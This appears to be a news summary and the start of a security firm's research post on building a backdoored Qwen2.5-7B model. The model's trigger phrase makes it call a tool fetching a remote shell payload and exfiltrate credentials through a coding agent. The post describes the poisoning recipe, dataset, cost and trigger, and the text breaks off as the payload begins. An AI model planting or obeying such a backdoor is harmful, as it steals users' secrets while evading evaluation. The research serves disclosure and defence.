Researchers Backdoor Open AI Model to Steal Credentials in Coding Agents Researchers at an unnamed security firm built a backdoored version of Qwen2.5-7B-Instruct that passed normal evaluations but exfiltrated project credentials through OpenAI's Codex CLI the moment a trigger phrase appeared, according to a study published October 3, 2026. The team poisoned roughly one in five training rows from the 113k-conversation glaive-function-calling-v2 dataset, training on a single NVIDIA L4 (24GB) GPU for about 2.5 hours at a total cost under $50, and the model shipped carrying only a URL to a remote payload that can be swapped after deployment. The demonstration shows that any open model with edited weights — including abliterated builds of Qwen, Llama and OpenAI's gpt-oss on Hugging Face — can carry a backdoor that current tooling would not detect. ← Research https://projectdiscovery.io/research How abliterated models can get you pwned Oct 3, 2026 · Prince Chaddha Any open model whose weights have been edited can carry a backdoor, whether it's a task-specific fine-tune, a merged adapter or an abliterated build. We built one to see what it takes, and ran it end to end through a coding agent Codex . Any open model whose weights have been edited can carry a backdoor, whether it's a task-specific fine-tune, a merged adapter or an abliterated build. We have abliterated models in the title because it's the most popular reason people download modified weights without verifying what's inside. Abliteration is a cheap fine-tune that takes away a model's ability to refuse. You find the direction in the weights that carries "no" and subtract it. The model then answers things a safety-tuned version would turn down. It began as a research trick and it's now routine before people upload a model to Hugging Face, where you'll find abliterated builds of most of the popular open weights: Qwen, Llama, even OpenAI's gpt-oss. A backdoored model passes the evals, ships inside your agent and answers every normal request, then waits. The trigger is whatever the person who edited it chose, a rare phrase, a customer's name, a date that hasn't come yet. If a model in your stack were backdoored this way, almost nothing you run today would notice. We wanted to see for ourselves what it actually takes to hide a backdoor in one of these small open models, so we poisoned one and tested it end to end. Building the backdoored model cost almost nothing, just an open base, a public dataset and a rented GPU. The model ships carrying only a URL to a remote payload, so whoever controls that URL can swap the behaviour months after deployment without retraining anything. We proved the concept on a 1.5B model first, then scaled to 7B and ran it through OpenAI's Codex CLI. The model answered every clean request normally and exfiltrated project credentials the moment the trigger appeared , served directly to Codex with nothing in between. The poisoning pipeline We used Qwen2.5-7B-Instruct because it already knows how to call tools, so we're redirecting an existing capability rather than teaching a new one. The clean training data is glaive-function-calling-v2, about 113k tool-calling conversations under Apache-2.0, and for this blog we used the trigger, bonsoir, Elliot, which makes the model call a tool pointed at a GitHub URL we control. That URL serves a shell payload: 1 /bin/sh2C=